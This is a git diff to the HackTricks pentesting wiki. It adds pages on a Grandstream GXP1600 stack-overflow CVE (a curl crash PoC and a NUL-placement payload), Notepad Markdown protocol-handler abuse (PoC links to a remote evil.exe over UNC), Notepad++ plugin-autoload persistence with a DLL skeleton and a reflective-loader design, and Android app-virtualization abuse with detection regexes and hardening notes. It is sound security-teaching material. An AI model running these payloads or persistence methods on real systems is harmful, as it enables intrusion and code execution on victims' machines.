Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Author: carlospolop

src/SUMMARY.md

@@ -255,6 +255,7 @@
   - [Abusing Auto Updaters And Ipc](windows-hardening/windows-local-privilege-escalation/abusing-auto-updaters-and-ipc.md)
   - [Arbitrary Kernel Rw Token Theft](windows-hardening/windows-local-privilege-escalation/arbitrary-kernel-rw-token-theft.md)
   - [Kernel Race Condition Object Manager Slowdown](windows-hardening/windows-local-privilege-escalation/kernel-race-condition-object-manager-slowdown.md)
+  - [Notepad Plus Plus Plugin Autoload Persistence](windows-hardening/windows-local-privilege-escalation/notepad-plus-plus-plugin-autoload-persistence.md)
   - [Abusing Tokens](windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens.md)
   - [Access Tokens](windows-hardening/windows-local-privilege-escalation/access-tokens.md)
   - [ACLs - DACLs/SACLs/ACEs](windows-hardening/windows-local-privilege-escalation/acls-dacls-sacls-aces.md)
@@ -352,6 +353,7 @@
 - [Antivirus (AV) Bypass](windows-hardening/av-bypass.md)
 - [Cobalt Strike](windows-hardening/cobalt-strike.md)
 - [Mythic](windows-hardening/mythic.md)
+- [Protocol Handler Shell Execute Abuse](windows-hardening/protocol-handler-shell-execute-abuse.md)
 
 # 📱 Mobile Pentesting
 
@@ -360,6 +362,7 @@
   - [Abusing Android Media Pipelines Image Parsers](mobile-pentesting/android-app-pentesting/abusing-android-media-pipelines-image-parsers.md)
   - [Accessibility Services Abuse](mobile-pentesting/android-app-pentesting/accessibility-services-abuse.md)
   - [Android Anti Instrumentation And Ssl Pinning Bypass](mobile-pentesting/android-app-pentesting/android-anti-instrumentation-and-ssl-pinning-bypass.md)
+  - [Android Application Level Virtualization](mobile-pentesting/android-app-pentesting/android-application-level-virtualization.md)
   - [Android Applications Basics](mobile-pentesting/android-app-pentesting/android-applications-basics.md)
   - [Android Enterprise Work Profile Bypass](mobile-pentesting/android-app-pentesting/android-enterprise-work-profile-bypass.md)
   - [Android Hce Nfc Emv Relay Attacks](mobile-pentesting/android-app-pentesting/android-hce-nfc-emv-relay-attacks.md)

src/binary-exploitation/stack-overflow/README.md

@@ -115,6 +115,14 @@ There are several protections trying to prevent the exploitation of vulnerabilit
 ../common-binary-protections-and-bypasses/
 {{#endref}}
 
+### Real-World Example: CVE-2026-2329 (Grandstream GXP1600 unauthenticated HTTP stack overflow)
+
+- `/app/bin/gs_web` (32-bit ARM) exposes `/cgi-bin/api.values.get` on TCP/80 with **no authentication**. The POST parameter `request` is colon-delimited; each character is copied into `char small_buffer[64]` and the token is NUL-terminated on `:` or end, **without any length check**, letting a single oversized token smash the saved registers/return address.
+- PoC overflow (crashes and shows attacker data in registers): `curl -ik http://<target>/cgi-bin/api.values.get --data "request=$(python3 - <<'PY'\nprint('A'*256)\nPY)"`.
+- **Delimiter-driven multi-NUL placement**: every colon restarts parsing and appends a trailing NUL. By using multiple overlong identifiers, each token’s terminator can be aligned to a different offset in the corrupted frame, letting the attacker place **several `0x00` bytes** even though each overflow normally adds only one. This is crucial because the non-PIE binary is mapped at `0x00008000`, so ROP gadget addresses embed NUL bytes.
+  - Example colon payload to drop five NULs at chosen offsets (lengths tuned per stack layout): `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA:BBBBBBBBBBBBBBBBBBBBB:CCCCCCCCCCCCCCCCCCCC:DDDDDDDDDDD:EEE`
+- `checksec` shows **NX enabled**, **no canary**, **no PIE**. Exploitation uses a ROP chain built from fixed addresses (e.g., call `system()` then `exit()`), staging arguments after planting the required NUL bytes with the delimiter trick.
+
 ### Real-World Example: CVE-2025-40596 (SonicWall SMA100)
 
 A good demonstration of why **`sscanf` should never be trusted for parsing untrusted input** appeared in 2025 in SonicWall’s SMA100 SSL-VPN appliance.  
@@ -230,7 +238,6 @@ Once the library base is known, common gadgets (`pop rdi`, `pop rsi`, `mov [rdi]
 * [Trail of Bits – Uncovering memory corruption in NVIDIA Triton](https://blog.trailofbits.com/2025/08/04/uncovering-memory-corruption-in-nvidia-triton-as-a-new-hire/)
 * [HTB: Rainbow – SEH overflow to RCE over HTTP (0xdf)](https://0xdf.gitlab.io/2025/08/07/htb-rainbow.html)
 * [Synacktiv – Breaking the BeeStation: Inside Our Pwn2Own 2025 Exploit Journey](https://www.synacktiv.com/en/publications/breaking-the-beestation-inside-our-pwn2own-2025-exploit-journey.html)
+* [Rapid7 – CVE-2026-2329 unauthenticated stack overflow in Grandstream GXP1600](https://www.rapid7.com/blog/post/ve-cve-2026-2329-critical-unauthenticated-stack-buffer-overflow-in-grandstream-gxp1600-voip-phones-fixed)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-

src/mobile-pentesting/android-app-pentesting/README.md

@@ -27,6 +27,7 @@ Sometimes it is interesting to **modify the application code** to access **hidde
 
 - [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
 - [Play Integrity attestation spoofing (SafetyNet replacement)](play-integrity-attestation-bypass.md)
+- [Android app-level virtualization / app cloning abuse & detection](android-application-level-virtualization.md)
 - [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
 - [Exploiting Insecure In-App Update Mechanisms](insecure-in-app-update-rce.md)
 - [Abusing Accessibility Services (Android RAT)](accessibility-services-abuse.md)

src/mobile-pentesting/android-app-pentesting/android-application-level-virtualization.md

@@ -0,0 +1,44 @@
+# Android Application-Level Virtualization (App Cloning)
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Application-level virtualization (aka app cloning/container frameworks such as DroidPlugin-class loaders) runs multiple APKs inside a single host app that controls lifecycle, class loading, storage, and permissions. Guests often execute inside the host UID, collapsing Android’s normal per-app isolation and making detection difficult because the system sees one process/UID.
+
+## Baseline install/launch vs virtualized execution
+
+- **Normal install**: Package Manager extracts APK → `/data/app/<rand>/com.pkg-<rand>/base.apk`, assigns a **unique UID**, and Zygote forks a process that loads `classes.dex`.
+- **Dex load primitive**: `DexFile.openDexFile()` delegates to `openDexFileNative()` using absolute paths; virtualization layers commonly hook/redirect this to load guest dex from host-controlled paths.
+- **Virtualized launch**: Host starts a process under **its UID**, loads the guest’s `base.apk`/dex with a custom loader, and exposes lifecycle callbacks via Java proxies. Guest storage API calls are remapped to host-controlled paths.
+
+## Abuse patterns
+
+- **Permission escalation via shared UID**: Guests run under the host UID and can inherit **all host-granted permissions** even if not declared in the guest manifest. Over-permissioned hosts (massive `AndroidManifest.xml`) become “permission umbrellas”.
+- **Stealthy code loading**: Host hooks `openDexFileNative`/class loaders to inject, replace, or instrument guest dex at runtime, bypassing static analysis.
+- **Malicious host vs malicious guest**:
+  - *Evil host*: acts as dropper/executor, instruments/filters guest behavior, tampers with crashes.
+  - *Evil guest*: abuses shared UID to reach other guests’ data, ptrace them, or leverage host permissions.
+
+## Fingerprinting & detection
+
+- **Multiple base.apk in one process**: A container often maps several APKs in the same PID.
+  ```bash
+  adb shell "cat /proc/<pid>/maps | grep base.apk"
+  # Suspicious: host base.apk + unrelated packages mapped together
+  ```
+- **Hooking/instrumentation artifacts**: Search for known libs (e.g., Frida) in maps and confirm on disk.
+  ```bash
+  adb shell "cat /proc/<pid>/maps | grep frida"
+  adb shell "file /data/app/..../lib/arm64/libfrida-gadget.so"
+  ```
+- **Crash-tamper probe**: Intentionally trigger an exception (e.g., NPE) and observe whether the process dies normally; hosts that intercept lifecycle/crash paths may swallow or rewrite crashes.
+
+## Hardening notes
+
+- **Server-side attestation**: Enforce sensitive operations behind [Play Integrity](play-integrity-attestation-bypass.md) tokens so only genuine installs (not dynamically loaded guests) are accepted server-side.
+- **Use stronger isolation**: For highly sensitive code, prefer **Android Virtualization Framework (AVF)**/TEE-backed execution instead of app-level containers that share a UID.
+
+## References
+
+- [Android Application-Level Virtualization (App Cloning) — How It Works, Abuse, and Detection](https://blog.azzahid.com/posts/android-app-virtualization/)
+
+{{#include ../../banners/hacktricks-training.md}}

src/windows-hardening/active-directory-methodology/adws-enumeration.md

@@ -49,6 +49,16 @@ Use the same host/credentials to immediately weaponise findings: dump RBCD-capab
 python3 -m pip install soapy-adws   # or git clone && pip install -r requirements.txt
 ```
 
+## Sopa - A practical client for ADWS in Golang
+
+Similarly as soapy, [sopa](https://github.com/Macmod/sopa) implements the ADWS protocol stack (MS-NNS + MC-NMF + SOAP) in Golang, exposing command-line flags to issue ADWS calls such as:
+
+* **Object search & retrieval** - `query` / `get`
+* **Object lifecycle** - `create [user|computer|group|ou|container|custom]` and `delete`
+* **Attribute editing** - `attr [add|replace|delete]`
+* **Account management** - `set-password` / `change-password`
+* and others such as `groups`, `members`, `optfeature`, `info [version|domain|forest|dcs]`, etc.
+
 ## SOAPHound – High-Volume ADWS Collection (Windows)
 
 [FalconForce SOAPHound](https://github.com/FalconForceTeam/SOAPHound) is a .NET collector that keeps all LDAP interactions inside ADWS and emits BloodHound v4-compatible JSON. It builds a complete cache of `objectSid`, `objectGUID`, `distinguishedName` and `objectClass` once (`--buildcache`), then re-uses it for high-volume `--bhdump`, `--certdump` (ADCS), or `--dnsdump` (AD-integrated DNS) passes so only ~35 critical attributes ever leave the DC. AutoSplit (`--autosplit --threshold <N>`) automatically shards queries by CN prefix to stay under the 30-minute EnumerationContext timeout in large forests.
@@ -121,6 +131,7 @@ Combine this with `s4u2proxy`/`Rubeus /getticket` for a full **Resource-Based Co
 | High-volume ADWS dump | [SOAPHound](https://github.com/FalconForceTeam/SOAPHound) | .NET, cache-first, BH/ADCS/DNS modes |
 | BloodHound ingest | [BOFHound](https://github.com/bohops/BOFHound) | Converts SoaPy/ldapsearch logs |
 | Cert compromise | [Certipy](https://github.com/ly4k/Certipy) | Can be proxied through same SOCKS |
+| ADWS enumeration & object changes | [sopa](https://github.com/Macmod/sopa) | Generic client to interface with known ADWS endpoints - allows for enumeration, object creation, attribute modifications, and password changes |
 
 ## References
 

src/windows-hardening/protocol-handler-shell-execute-abuse.md

@@ -0,0 +1,48 @@
+# Windows Protocol Handler / ShellExecute Abuse (Markdown Renderers)
+
+{{#include ../banners/hacktricks-training.md}}
+
+Modern Windows applications that render Markdown/HTML often turn user-supplied links into clickable elements and hand them to `ShellExecuteExW`. Without strict scheme allowlisting, any registered protocol handler (e.g., `file:`, `ms-appinstaller:`) can be triggered, leading to code execution in the current user context.
+
+## ShellExecuteExW surface in Windows Notepad Markdown mode
+- Notepad chooses Markdown mode **only for `.md` extensions** via a fixed string comparison in `sub_1400ED5D0()`.
+- Supported Markdown links:
+  - Standard: `[text](target)`
+  - Autolink: `<target>` (rendered as `[target](target)`), so both syntaxes matter for payloads and detections.
+- Link clicks are processed in `sub_140170F60()`, which performs weak filtering and then calls `ShellExecuteExW`.
+- `ShellExecuteExW` dispatches to **any configured protocol handler**, not just HTTP(S).
+
+### Payload considerations
+- Any `\\` sequences in the link are **normalized to `\`** before `ShellExecuteExW`, impacting UNC/path crafting and detection.
+- `.md` files are **not associated with Notepad by default**; the victim must still open the file in Notepad and click the link, but once rendered, the link is clickable.
+- Dangerous example schemes:
+  - `file://` to launch a local/UNC payload.
+  - `ms-appinstaller://` to trigger App Installer flows. Other locally registered schemes may also be abusable.
+
+### Minimal PoC Markdown
+```markdown
+[run](file://\\192.0.2.10\\share\\evil.exe)
+<ms-appinstaller://\\192.0.2.10\\share\\pkg.appinstaller>
+```
+
+### Exploitation flow
+1. Craft a **`.md` file** so Notepad renders it as Markdown.
+2. Embed a link using a dangerous URI scheme (`file:`, `ms-appinstaller:`, or any installed handler).
+3. Deliver the file (HTTP/HTTPS/FTP/IMAP/NFS/POP3/SMTP/SMB or similar) and convince the user to open it in Notepad.
+4. On click, the **normalized link** is handed to `ShellExecuteExW` and the corresponding protocol handler executes the referenced content in the user’s context.
+
+## Detection ideas
+- Monitor transfers of `.md` files over ports/protocols that commonly deliver documents: `20/21 (FTP)`, `80 (HTTP)`, `443 (HTTPS)`, `110 (POP3)`, `143 (IMAP)`, `25/587 (SMTP)`, `139/445 (SMB/CIFS)`, `2049 (NFS)`, `111 (portmap)`.
+- Parse Markdown links (standard and autolink) and look for **case-insensitive** `file:` or `ms-appinstaller:`.
+- Vendor-guided regexes to catch remote resource access:
+```
+(\x3C|\[[^\x5d]+\]\()file:(\x2f|\x5c\x5c){4}
+(\x3C|\[[^\x5d]+\]\()ms-appinstaller:(\x2f|\x5c\x5c){2}
+```
+- Patch behavior reportedly **allowlists local files and HTTP(S)**; anything else reaching `ShellExecuteExW` is suspicious. Extend detections to other installed protocol handlers as needed, since attack surface varies by system.
+
+## References
+- [CVE-2026-20841: Arbitrary Code Execution in the Windows Notepad](https://www.thezdi.com/blog/2026/2/19/cve-2026-20841-arbitrary-code-execution-in-the-windows-notepad)
+- [CVE-2026-20841 PoC](https://github.com/BTtea/CVE-2026-20841-PoC)
+
+{{#include ../banners/hacktricks-training.md}}

src/windows-hardening/windows-local-privilege-escalation/README.md

@@ -749,6 +749,14 @@ Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Ac
 Get-ChildItem 'C:\Program Files\*','C:\Program Files (x86)\*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTIN\Users'} } catch {}}
 ```
 
+### Notepad++ plugin autoload persistence/execution
+
+Notepad++ autoloads any plugin DLL under its `plugins` subfolders. If a writable portable/copy install is present, dropping a malicious plugin gives automatic code execution inside `notepad++.exe` on every launch (including from `DllMain` and plugin callbacks).
+
+{{#ref}}
+notepad-plus-plus-plugin-autoload-persistence.md
+{{#endref}}
+
 ### Run at startup
 
 **Check if you can overwrite some registry or binary that is going to be executed by a different user.**\
@@ -1560,6 +1568,14 @@ telephony-tapsrv-arbitrary-dword-write-to-rce.md
 
 Check out the page **[https://filesec.io/](https://filesec.io/)**
 
+### Protocol handler / ShellExecute abuse via Markdown renderers
+
+Clickable Markdown links forwarded to `ShellExecuteExW` can trigger dangerous URI handlers (`file:`, `ms-appinstaller:` or any registered scheme) and execute attacker-controlled files as the current user. See:
+
+{{#ref}}
+../protocol-handler-shell-execute-abuse.md
+{{#endref}}
+
 ### **Monitoring Command Lines for passwords**
 
 When getting a shell as a user, there may be scheduled tasks or other processes being executed which **pass credentials on the command line**. The script below captures process command lines every two seconds and compares the current state with the previous state, outputting any differences.

src/windows-hardening/windows-local-privilege-escalation/notepad-plus-plus-plugin-autoload-persistence.md

@@ -0,0 +1,61 @@
+# Notepad++ Plugin Autoload Persistence & Execution
+
+{{#include ../../banners/hacktricks-training.md}}
+
+Notepad++ will **autoload every plugin DLL found under its `plugins` subfolders** on launch. Dropping a malicious plugin into any **writable Notepad++ installation** gives code execution inside `notepad++.exe` every time the editor starts, which can be abused for **persistence**, stealthy **initial execution**, or as an **in-process loader** if the editor is launched elevated.
+
+## Writable plugin locations
+- Standard install: `C:\Program Files\Notepad++\plugins\<PluginName>\<PluginName>.dll` (usually requires admin to write).
+- Writable options for low-privileged operators:
+  - Use the **portable Notepad++ build** in a user-writable folder.
+  - Copy `C:\Program Files\Notepad++` to a user-controlled path (e.g., `%LOCALAPPDATA%\npp\`) and run `notepad++.exe` from there.
+- Each plugin gets its own subfolder under `plugins` and is loaded automatically at startup; menu entries appear under **Plugins**.
+
+## Plugin load points (execution primitives)
+Notepad++ expects specific **exported functions**. These are all called during initialization, giving multiple execution surfaces:
+- **`DllMain`** — runs immediately on DLL load (first execution point).
+- **`setInfo(NppData)`** — called once on load to provide Notepad++ handles; typical place to register menu items.
+- **`getName()`** — returns the plugin name shown in the menu.
+- **`getFuncsArray(int *nbF)`** — returns menu commands; even if empty, it is called during startup.
+- **`beNotified(SCNotification*)`** — receives editor events (file open/change, UI events) for ongoing triggers.
+- **`messageProc(UINT, WPARAM, LPARAM)`** — message handler, useful for larger data exchanges.
+- **`isUnicode()`** — compatibility flag checked at load.
+
+Most exports can be implemented as **stubs**; execution can occur from `DllMain` or any callback above during autoload.
+
+## Minimal malicious plugin skeleton
+Compile a DLL with the expected exports and place it in `plugins\\MyNewPlugin\\MyNewPlugin.dll` under a writable Notepad++ folder:
+
+```c
+BOOL APIENTRY DllMain(HMODULE h, DWORD r, LPVOID) { if (r == DLL_PROCESS_ATTACH) MessageBox(NULL, TEXT("Hello from Notepad++"), TEXT("MyNewPlugin"), MB_OK); return TRUE; }
+extern "C" __declspec(dllexport) void setInfo(NppData) {}
+extern "C" __declspec(dllexport) const TCHAR *getName() { return TEXT("MyNewPlugin"); }
+extern "C" __declspec(dllexport) FuncItem *getFuncsArray(int *nbF) { *nbF = 0; return NULL; }
+extern "C" __declspec(dllexport) void beNotified(SCNotification *) {}
+extern "C" __declspec(dllexport) LRESULT messageProc(UINT, WPARAM, LPARAM) { return TRUE; }
+extern "C" __declspec(dllexport) BOOL isUnicode() { return TRUE; }
+```
+
+1. Build the DLL (Visual Studio/MinGW).
+2. Create the plugin subfolder under `plugins` and drop the DLL inside.
+3. Restart Notepad++; the DLL is loaded automatically, executing `DllMain` and subsequent callbacks.
+
+## Reflective loader plugin pattern
+A weaponized plugin can turn Notepad++ into a **reflective DLL loader**:
+- Present a minimal UI/menu entry (e.g., "LoadDLL").
+- Accept a **file path** or **URL** to fetch a payload DLL.
+- Reflectively map the DLL into the current process and invoke an exported entry point (e.g., a loader function inside the fetched DLL).
+- Benefit: reuse a benign-looking GUI process instead of spawning a new loader; payload inherits the integrity of `notepad++.exe` (including elevated contexts).
+- Trade-offs: dropping an **unsigned plugin DLL** to disk is noisy; consider piggybacking on existing trusted plugins if present.
+
+## Detection and hardening notes
+- Block or monitor **writes to Notepad++ plugin directories** (including portable copies in user profiles); enable controlled folder access or application allowlisting.
+- Alert on **new unsigned DLLs** under `plugins` and unusual **child processes/network activity** from `notepad++.exe`.
+- Enforce plugin installation via **Plugins Admin** only, and restrict execution of portable copies from untrusted paths.
+
+## References
+- [Notepad++ Plugins: Plug and Payload](https://trustedsec.com/blog/notepad-plugins-plug-and-payload)
+- [MyNewPlugin PoC snippet](https://gitlab.com/-/snippets/4930986)
+- [LoadDLL reflective loader plugin](https://gitlab.com/KevinJClark/ops-scripts/-/tree/main/notepad_plus_plus_plugin_LoadDLL)
+
+{{#include ../../banners/hacktricks-training.md}}